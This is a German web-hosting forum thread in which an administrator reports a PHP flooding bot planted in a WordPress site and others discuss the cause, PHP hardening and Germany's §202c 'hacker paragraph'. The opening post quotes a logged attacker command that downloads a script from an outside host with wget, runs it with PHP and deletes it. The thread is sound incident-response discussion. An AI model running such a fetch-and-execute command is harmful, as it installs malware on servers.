PHP Bot in WordPress

[Mr.Check]

Moin moin,

gestern hat es mal wieder geknallt. Auf eine Webseite (WordPress, laut Kunde aktuellste Version) konnte ein PHP-Bot eingespielt werden (ist im Cache-Verzeichnis eines Themes gelandet), welcher sich mit einem IRC-Server verbunden hat, um dort die Befehle für Flooding-Attacken entgegenzunehmen.

Interessant finde ich vor allem, dass der Angreifer in der Lage war, über PHP per wget das Script auf den Server zu laden:

\_ /usr/bin/php5-cgi -c /verzeichnis/des/kunden/etc/php.ini
10003     1457  0.0  0.0   9556  1436 ?        S    20:07   0:00  |   |   \_ sh -c wget http://androidk.0hna.com/images/dp.jpw; lwp-download http://androidk.0hna.com/images/dp.jpw; chmod 777 dp.jpw; php dp.jpw; rm -rf dp.jpw*; d

Hier das Script:
MOD: Malware-Script gelöscht!

Habe die Website erstmal vom Netz genommen und den Provider, der den IRC-Server hosted informiert, im Laufe des Tages werde ich mir das mal genauer ansehen.

Hat hier jemand vielleicht ähnliche Erfahrungen gemacht und kennt die hier ausgenutze Schwachstelle? Würde dem Kunden gerne eine Handlungsempfehlung geben.

 

[Jenstheclown]

Bitte verschleiere Teile vom Script, nicht damit die Kids noch auf Ideen kommen

 

[TerraX]

Hat hier jemand vielleicht ähnliche Erfahrungen gemacht und kennt die hier ausgenutze Schwachstelle? Würde dem Kunden gerne eine Handlungsempfehlung geben.

Dazu müsste man die entsprechende access.log kennen sowie wahrscheinlich zusätzlich installierte Plugins/Addons der WordPress-Installation. Vorausgesetzt der Kunde hat tatsächlich die aktuellste Version installiert gehabt und es handelt sich nicht nur um eine Schutzbehauptung.

 

[Mr.Check]

Eigentlich habe ich das Script bewusst drin gelassen, damit esggf. wiedererkannt wird. Aufklärung und zu wissen wie die Verrückten arbeiten halte ich für das Wichtigste. Aber gut...

 

[Huschi]

Das Script musste raus, da die Verbreitung jeglicher Arten von "Hacker-Tools" in Deutschland verboten ist. Sollte jeder (auch angehender) ITler wissen.

Dein Fall ist aber kein echtes Problem, oder? Du hast Datum und Uhrzeit wann der Prozess gestartet wurde. Im Access-Log finden sich dazu bestimmt nur wenige Eintrag die dazu geführt haben können.

huschi.

 

[Mr.Check]

Moin Huschi,

sicherlich ist die Verbreitung von sog. "Hacker-Tools" verboten. Da dieses Script aber so für sich allein komplett nutzlos ist, habe ich es in diesem Fall anders bewertet. Strafbar ist soweit ich weiß ja auch nur die Weitergabe von Programmen, die dem Ausspähen (§202a StGB) oder dem Abfangen (§202b StGB) von Daten dienen. Aber ist ja auch egal, ich kann deine Intention und die Entfernung durchaus nachvollziehen.

Was heißt echtes Problem. Es sieht so aus, als ob die Fehlerquelle ein veraltetes WordPress-Plugin war. Dies hat der Kunde mittlerweile geupdated (wie im übrigen auch das WordPress). Ansonsten sieht die Website unverdächtig aus.


PS: Vielleicht sollte man aber über einen geschützten Bereich nachdenken, in dem sich verifizierte User über solchen Schadcode (von mir aus auch in gekürzter, damit noch unwirksamerer Form) austauschen können. Sich mit dem Inhalt der Funktionsweise solcher Scripts auseinanderzusetzen kann durchaus Sinn machen, und man muss ja nicht immer erst selbst betroffen sein

 

[TerraX]

PS: Vielleicht sollte man aber über einen geschützten Bereich nachdenken, in dem sich verifizierte User über solchen Schadcode (von mir aus auch in gekürzter, damit noch unwirksamerer Form) austauschen können. Sich mit dem Inhalt der Funktionsweise solcher Scripts auseinanderzusetzen kann durchaus Sinn machen, und man muss ja nicht immer erst selbst betroffen sein

Theoretisch wäre das sogar rechtlich eigentlich problemlos möglich nach

§ 202c Vorbereiten des Ausspähens und Abfangens von Daten[6]

Absatz 1 (1) Wer eine Straftat nach § 202a oder § 202b vorbereitet, indem er

1.Passwörter oder sonstige Sicherungscodes, die den Zugang zu Daten (§ 202a Abs. 2) ermöglichen, oder
2.Computerprogramme, deren Zweck die Begehung einer solchen Tat ist,
herstellt, sich oder einem anderen verschafft, verkauft, einem anderen überlässt, verbreitet oder sonst zugänglich macht, wird mit Freiheitsstrafe bis zu einem Jahr oder mit Geldstrafe bestraft.

Absatz 2 (2) § 149 Abs. 2 und 3 gilt entsprechend

Weil immerhin der Vorsatz, eine konkrete Straftat begehen zu wollen, vorliegen muss. Aber im hinblick auf übereifrige Staatsanwälte und sonstige Quertreiber eher gefährlich. Wer will schon das mind. finanzielle Risiko auf sich nehmen, sowas im Falle eines Falles auszufechten? Folge: Selbstzensur und Verschwinden der Themen außer Sichtweite im Untergrund ... tjaja ...

 

[Terrorkarotte]

Mal eine ganz andere Frage:
Ist es Absicht, dass der Vhost system(), exec() und dergleichen aufrufen kann?

Wäre es nicht vielleicht sinnvoll mit open_basedir in der php.ini zu arbeiten?

 

[Mr.Check]

Mal eine ganz andere Frage:
Ist es Absicht, dass der Vhost system(), exec() und dergleichen aufrufen kann?

Wäre es nicht vielleicht sinnvoll mit open_basedir in der php.ini zu arbeiten?

Wenn ich mich mit der Konfiguration der Kunden-vServer auch noch auseinandersetzen würde...

 

[Terrorkarotte]

Diese Information war nicht ersichtlich aus den vorangegangenen Posts

 

[Deleted member 11740]

Das Script musste raus, da die Verbreitung jeglicher Arten von "Hacker-Tools" in Deutschland verboten ist. Sollte jeder (auch angehender) ITler wissen.

Ich wollte es nicht glauben: http://www.gesetze-im-internet.de/stgb/__202c.html

Das Portscanner nmap ist nach dem Gestz zulässig. Falls das nicht so ist, dann gute Nacht.

 

[Mr.Check]

Ich wollte es nicht glauben: http://www.gesetze-im-internet.de/stgb/__202c.html

Das Portscanner nmap ist nach dem Gestz zulässig. Falls das nicht so ist, dann gute Nacht.

Ich kann dir nicht so ganz folgen... !?

 

[Huschi]

Zum Folgen bitte den Wikipedia-Beitrag lesen: http://de.wikipedia.org/wiki/Hackerparagraf
Der fasst es relativ gut zusammen, wenn auch nur - wie üblich - recht oberflächlich.

Das wesentliche Stichwort (welches das Bundesverfassungsgericht in einem Urteil erwähnt) ist "dual use tools". Also Software mit zwei möglichen Nutzungsarten. Eben das Austesten von eigenen Netzwerken und das Austesten von fremden Netzwerken.

Darunter fällt aber keine PHP-Script, welches nichts anderes macht als andere Server zu flooden. Denn dem kann man bei besten Willen keinen "sinnvollen Test-Charakter" attestieren. Daher ist die Verbreitung solcher Scripte mit entsprechender Vorsicht zu genießen.

huschi.

 

[Mr.Check]

MOD: Full-Quote entfernt.

Sicherlich ist das ein heißes Eisen. Wie ein Richter so etwas bewerten würde, lässt sich auch nur schwer erahnen. Aus technischer Sicht lässt sich die Verbreitung eines solchen Tools meiner Meinung nach jedoch leicht vertreten:

Mit einem Sniffer kann ich fremde Daten abfangen, oder testen, ob sich die eigenen Daten abfangen lassen. Mit diesem Script könnte ich einen DDoS auf jemand anders starten, oder auf mich selbst, um einen entsprechenden Schutzmechanismus zu überprüfen. In einem Forum diesem Forum diente die Verbreitung ja sogar eindeutig einem guten Zweck, nämlich anderen Administratoren die Möglichkeit zu geben, sich mit den schädlichen Scripts/Tools/wasauchimmer auseinanderzusetzen. Allerdings war das Script in diesem Fall wohl in der Tat etwas unglücklich platziert, weil öffentlich zugänglich.